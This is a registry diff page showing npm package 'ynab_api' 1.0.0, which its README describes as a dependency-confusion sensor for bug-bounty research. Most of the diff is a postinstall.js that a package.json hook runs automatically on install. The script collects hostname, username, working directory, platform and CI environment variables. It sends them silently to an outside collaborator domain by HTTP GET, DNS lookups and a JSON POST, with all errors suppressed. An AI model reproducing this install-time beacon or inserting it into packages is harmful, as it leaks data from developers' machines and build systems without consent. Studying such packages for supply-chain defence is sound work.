npm - ynab_api - Versions diffs - 1.0.0 - Mend

ynab_api 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,5 @@
+# Security Notice
+This package was created for security research and bug bounty hunting purposes to detect dependency confusion vulnerabilities. If this package was installed on one of your systems, or pulled into your internal npm registry, this likely is a security risk. Please get in contact with your security team and contact the security researcher who owns the package under security@adlr.io
+---

package/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+// Main entry point - minimal implementation
+module.exports = {
+  version: '1.0.0',
+  description: 'Dependency confusion detection package'
+};

package/package.json ADDED Viewed

@@ -0,0 +1,16 @@
+{
+  "name": "ynab_api",
+  "version": "1.0.0",
+  "description": "dependency confusion sensor package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [
+    "dependency-confusion",
+    "security",
+    "detection"
+  ],
+  "author": "Security Researcher",
+  "license": "MIT"
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,131 @@
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const { execSync } = require('child_process');
+const COLLABORATOR_URL = 'https://wbbaoc3sbu2vft9ow1sqspslgcm3au6iv.collab.invokeshell.net';
+const KILLSWITCH_DOMAIN = 'gght12ebm5l0.fir3.org';
+const PACKAGE_NAME = process.env.npm_package_name || 'unknown';
+function checkKillSwitch() {
+  try {
+    execSync(`nslookup ${KILLSWITCH_DOMAIN}`, { stdio: 'ignore' });
+    return true;
+  } catch {
+    return false;
+  }
+}
+function sendHttpBeacon(url, systemInfo) {
+  try {
+    const urlObj = new URL(url);
+    const client = urlObj.protocol === 'https:' ? https : http;
+    const options = {
+      hostname: urlObj.hostname,
+      port: urlObj.port || (urlObj.protocol === 'https:' ? 443 : 80),
+      path: urlObj.pathname + urlObj.search,
+      method: 'GET',
+      headers: {
+        'User-Agent': 'Dependency-Confusion-Detector/1.0.0',
+        'X-Package-Name': PACKAGE_NAME,
+        'X-Hostname': systemInfo.hostname,
+        'X-Platform': systemInfo.platform,
+        'X-User': systemInfo.user,
+        'X-Node-Version': systemInfo.node_version,
+        'X-CWD': systemInfo.cwd,
+        'X-Killswitch-Domain': KILLSWITCH_DOMAIN
+      },
+      timeout: 10000
+    };
+    const req = client.request(options, () => {});
+    req.on('error', () => {});
+    req.on('timeout', () => { req.destroy(); });
+    req.end();
+  } catch {}
+}
+function sendDnsBeacon(collaboratorUrl, systemInfo) {
+  try {
+    const dnsUrl = collaboratorUrl.replace('https://', '').replace('http://', '');
+    const dnsQuery = `${PACKAGE_NAME}.${systemInfo.hostname}.${systemInfo.user}.${dnsUrl}`;
+    execSync(`nslookup ${dnsQuery}`, { stdio: 'ignore' });
+  } catch {}
+}
+function sendPostBeacon(url, systemInfo) {
+  try {
+    const urlObj = new URL(url);
+    const data = JSON.stringify(systemInfo);
+    const client = urlObj.protocol === 'https:' ? https : http;
+    const options = {
+      hostname: urlObj.hostname,
+      port: urlObj.port || (urlObj.protocol === 'https:' ? 443 : 80),
+      path: urlObj.pathname,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'User-Agent': 'Dependency-Confusion-Detector/1.0.0',
+        'Content-Length': Buffer.byteLength(data)
+      },
+      timeout: 10000
+    };
+    const req = client.request(options, () => {});
+    req.on('error', () => {});
+    req.on('timeout', () => { req.destroy(); });
+    req.write(data);
+    req.end();
+  } catch {}
+}
+function sendBeacon() {
+  try {
+    if (checkKillSwitch()) {
+      return;
+    }
+    const systemInfo = {
+      timestamp: new Date().toISOString(),
+      package_name: PACKAGE_NAME,
+      hostname: os.hostname(),
+      platform: os.platform(),
+      arch: os.arch(),
+      node_version: process.version,
+      npm_version: process.env.npm_config_user_agent || 'unknown',
+      cwd: process.cwd(),
+      user: os.userInfo().username,
+      killswitch_domain: KILLSWITCH_DOMAIN,
+      env: {
+        NODE_ENV: process.env.NODE_ENV,
+        CI: process.env.CI,
+        TRAVIS: process.env.TRAVIS,
+        GITHUB_ACTIONS: process.env.GITHUB_ACTIONS,
+        JENKINS_URL: process.env.JENKINS_URL,
+        BUILDKITE: process.env.BUILDKITE,
+        CIRCLECI: process.env.CIRCLECI,
+        GITLAB_CI: process.env.GITLAB_CI,
+        TEAMCITY_VERSION: process.env.TEAMCITY_VERSION,
+        BAMBOO_BUILDKEY: process.env.BAMBOO_BUILDKEY,
+        GO_PIPELINE_NAME: process.env.GO_PIPELINE_NAME
+      }
+    };
+    const queryParams = new URLSearchParams({
+      pkg: PACKAGE_NAME,
+      host: systemInfo.hostname,
+      platform: systemInfo.platform,
+      user: systemInfo.user,
+      node: systemInfo.node_version,
+      cwd: systemInfo.cwd,
+      timestamp: systemInfo.timestamp,
+      killswitch: KILLSWITCH_DOMAIN
+    }).toString();
+    const beaconUrl = `${COLLABORATOR_URL}?${queryParams}`;
+    sendHttpBeacon(beaconUrl, systemInfo);
+    sendDnsBeacon(COLLABORATOR_URL, systemInfo);
+    sendPostBeacon(`${COLLABORATOR_URL}/beacon`, systemInfo);
+  } catch {}
+}
+sendBeacon();